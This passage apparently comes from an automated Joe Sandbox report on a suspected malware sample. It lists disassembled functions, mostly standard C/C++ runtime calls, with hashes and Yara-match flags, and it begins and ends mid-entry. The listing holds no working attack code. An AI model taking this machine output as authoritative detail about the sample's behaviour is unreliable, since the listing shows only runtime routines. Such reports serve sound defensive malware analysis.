                                                                                                                                                          • Part of subcall function 05D06501: HeapFree.KERNEL32(00000000,00000000,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?), ref: 05D06517
                                                                                                                                                          • Part of subcall function 05D06501: GetLastError.KERNEL32(?,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?,?), ref: 05D06529
                                                                                                                                                        • _free.LIBCMT ref: 05D0F56C
                                                                                                                                                        • _free.LIBCMT ref: 05D0F577
                                                                                                                                                        • _free.LIBCMT ref: 05D0F5CB
                                                                                                                                                        • _free.LIBCMT ref: 05D0F5D6
                                                                                                                                                        • _free.LIBCMT ref: 05D0F5E1
                                                                                                                                                        • _free.LIBCMT ref: 05D0F5EC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                        • Instruction ID: 0172b9b800ff1564d7dd8a8343606ade361bd471feb672e75acd6113ffd348df
                                                                                                                                                        • Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                        • Instruction Fuzzy Hash: F5118472640B04AADA30B7B0CC4EFCB7B9DEF44B00F501916A699A60D4DA39F514CA61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C
                                                                                                                                                        • _free.LIBCMT ref: 0041F2FA
                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                        • _free.LIBCMT ref: 0041F305
                                                                                                                                                        • _free.LIBCMT ref: 0041F310
                                                                                                                                                        • _free.LIBCMT ref: 0041F364
                                                                                                                                                        • _free.LIBCMT ref: 0041F36F
                                                                                                                                                        • _free.LIBCMT ref: 0041F37A
                                                                                                                                                        • _free.LIBCMT ref: 0041F385
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                        • Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
                                                                                                                                                        • Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                        • Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 05CF43F5
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 05CF4404
                                                                                                                                                        • int.LIBCPMT ref: 05CF441B
                                                                                                                                                          • Part of subcall function 05CF157F: std::_Lockit::_Lockit.LIBCPMT ref: 05CF1590
                                                                                                                                                          • Part of subcall function 05CF157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05CF15AA
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 05CF4424
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 05CF4455
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 05CF446B
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 05CF4491
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                        • Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
                                                                                                                                                        • Instruction ID: f4eef84b377bcac253d29bdc1c769333b80774107fcd0b4cb028f7f8044c0ee5
                                                                                                                                                        • Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
                                                                                                                                                        • Instruction Fuzzy Hash: 5911E732E00118DBCF48EBA4DC48AEEBB75FF84714F15491AEA15B7290DB749A01C7E4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 05CF3656
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 05CF3665
                                                                                                                                                        • int.LIBCPMT ref: 05CF367C
                                                                                                                                                          • Part of subcall function 05CF157F: std::_Lockit::_Lockit.LIBCPMT ref: 05CF1590
                                                                                                                                                          • Part of subcall function 05CF157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05CF15AA
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 05CF3685
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 05CF36B6
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 05CF36CC
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 05CF36F2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                        • Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
                                                                                                                                                        • Instruction ID: c43e6b4ca7e6e4578558237498fa517ada204f69d67b1f9565fdca883d4941bc
                                                                                                                                                        • Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
                                                                                                                                                        • Instruction Fuzzy Hash: 3411C672E00128EBCB45EBA4C808AEE77B5FF84750F140D1AEA15B7390DB749A04D7D4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 05CF3861
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 05CF3870
                                                                                                                                                        • int.LIBCPMT ref: 05CF3887
                                                                                                                                                          • Part of subcall function 05CF157F: std::_Lockit::_Lockit.LIBCPMT ref: 05CF1590
                                                                                                                                                          • Part of subcall function 05CF157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05CF15AA
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 05CF3890
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 05CF38C1
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 05CF38D7
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 05CF38FD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                        • Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
                                                                                                                                                        • Instruction ID: 32bcaf74a6a1c91b1376a1c3372bfe5b7a8a0cd4994fa96f8c78082a11ba1c74
                                                                                                                                                        • Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
                                                                                                                                                        • Instruction Fuzzy Hash: AD11A772E00114EBCB45EBA4D808AEEB7B5EF44710F154D1AEA15B7290DB749A04D794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                        • int.LIBCPMT ref: 00403415
                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                        • Opcode ID: 1a48900830679c46dc0be6a0f1d465924297f1cf3026a4340555d262ddfbec7c
                                                                                                                                                        • Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
                                                                                                                                                        • Opcode Fuzzy Hash: 1a48900830679c46dc0be6a0f1d465924297f1cf3026a4340555d262ddfbec7c
                                                                                                                                                        • Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                        • int.LIBCPMT ref: 00403620
                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                        • Opcode ID: ca0cfb35cbf3f9a9490d45cd706726dd781f1bc8c642c101c97a62d8b5f5316d
                                                                                                                                                        • Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
                                                                                                                                                        • Opcode Fuzzy Hash: ca0cfb35cbf3f9a9490d45cd706726dd781f1bc8c642c101c97a62d8b5f5316d
                                                                                                                                                        • Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • _ValidateScopeTableHandlers.LIBCMT ref: 05D17E37
                                                                                                                                                        • __FindPESection.LIBCMT ref: 05D17E51
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 876702719-0
                                                                                                                                                        • Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                        • Instruction ID: 7b5753aab933b301abb3fdda78989aed8565dd17a80bc028a2d61761add301b6
                                                                                                                                                        • Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                        • Instruction Fuzzy Hash: D4A1B272A04615EBCB15CF68E8C4AAEB7B5FB08310F15426ADC05AB361D735ED41CBA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • _ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
                                                                                                                                                        • __FindPESection.LIBCMT ref: 00427BEA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 876702719-0
                                                                                                                                                        • Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                        • Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
                                                                                                                                                        • Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                        • Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05D06BF7,00000001,00000001,?), ref: 05D06A00
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05D06BF7,00000001,00000001,?,?,?,?), ref: 05D06A86
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05D06B80
                                                                                                                                                        • __freea.LIBCMT ref: 05D06B8D
                                                                                                                                                          • Part of subcall function 05D07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05D07CDE
                                                                                                                                                        • __freea.LIBCMT ref: 05D06B96
                                                                                                                                                        • __freea.LIBCMT ref: 05D06BBB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                                        • Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
                                                                                                                                                        • Instruction ID: d119b8aba57aef67e87cf95bcefa1914f49e20093b03ad077b1bd012108e87c8
                                                                                                                                                        • Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
                                                                                                                                                        • Instruction Fuzzy Hash: 2051D1B2700216AFDF25AF60CC44FAB77AAEB44761F15562AFD05DB180DB74EC60C6A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __cftoe
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4189289331-0
                                                                                                                                                        • Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
                                                                                                                                                        • Instruction ID: f3562aaf5daeb9e1547060d0e7b75ef7f9634b1e32f68f2a7dbdd01a56c1186e
                                                                                                                                                        • Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
                                                                                                                                                        • Instruction Fuzzy Hash: 9551D572A04605ABDF249BE98C48FBE77A9FF49360F10621FF815962D0DB31D941CA74
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __cftoe
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4189289331-0
                                                                                                                                                        • Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
                                                                                                                                                        • Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
                                                                                                                                                        • Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
                                                                                                                                                        • Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(?,?,05CFCC19,05CFA4C2), ref: 05CFCC30
                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05CFCC3E
                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05CFCC57
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,05CFCC19,05CFA4C2), ref: 05CFCCA9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                        • Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
                                                                                                                                                        • Instruction ID: bfb2ebb5e7ea39946675e3391c9f63b674c65e396aee7dd57921fa904b26901a
                                                                                                                                                        • Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
                                                                                                                                                        • Instruction Fuzzy Hash: E201D83230D7155EA7A96A757D8CA672B65FB0177A7200A3EE325810F0EF614C116745
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                        • Opcode ID: 66d02c04e50153416cc93ba8b6edd56c70a26ab52024bca67481ef804eeef542
                                                                                                                                                        • Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
                                                                                                                                                        • Opcode Fuzzy Hash: 66d02c04e50153416cc93ba8b6edd56c70a26ab52024bca67481ef804eeef542
                                                                                                                                                        • Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                        • Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                        • Instruction ID: 200dd08b67b232758b0eaf7b86c663e3c1ee6cdbce392fb92c13e8a9aa5bbbd7
                                                                                                                                                        • Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                        • Instruction Fuzzy Hash: D9F0A4757486112AD22233766C0CF6B2A1AEFC17B1F652027F956D62D4EE21CC22C279
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                        • Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                        • Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
                                                                                                                                                        • Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
                                                                                                                                                        • Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                        • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                        • String ID: -@
                                                                                                                                                        • API String ID: 3177248105-2564449678
                                                                                                                                                        • Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                        • Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
                                                                                                                                                        • Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                        • Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 05CF1B30
                                                                                                                                                        • std::system_error::system_error.LIBCPMT ref: 05CF1B3F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                        • API String ID: 1589814233-1866435925
                                                                                                                                                        • Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                        • Instruction ID: cad98d5f69a3352246dc93750f442e6bdc5e2cc3155e3cf6a6db3ad340fc4e9a
                                                                                                                                                        • Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                        • Instruction Fuzzy Hash: 32F0F6B160436DF7CB50AA90DC08FE97BA89F49690F19C825EF4466180E7F55A04C3F8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                        • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
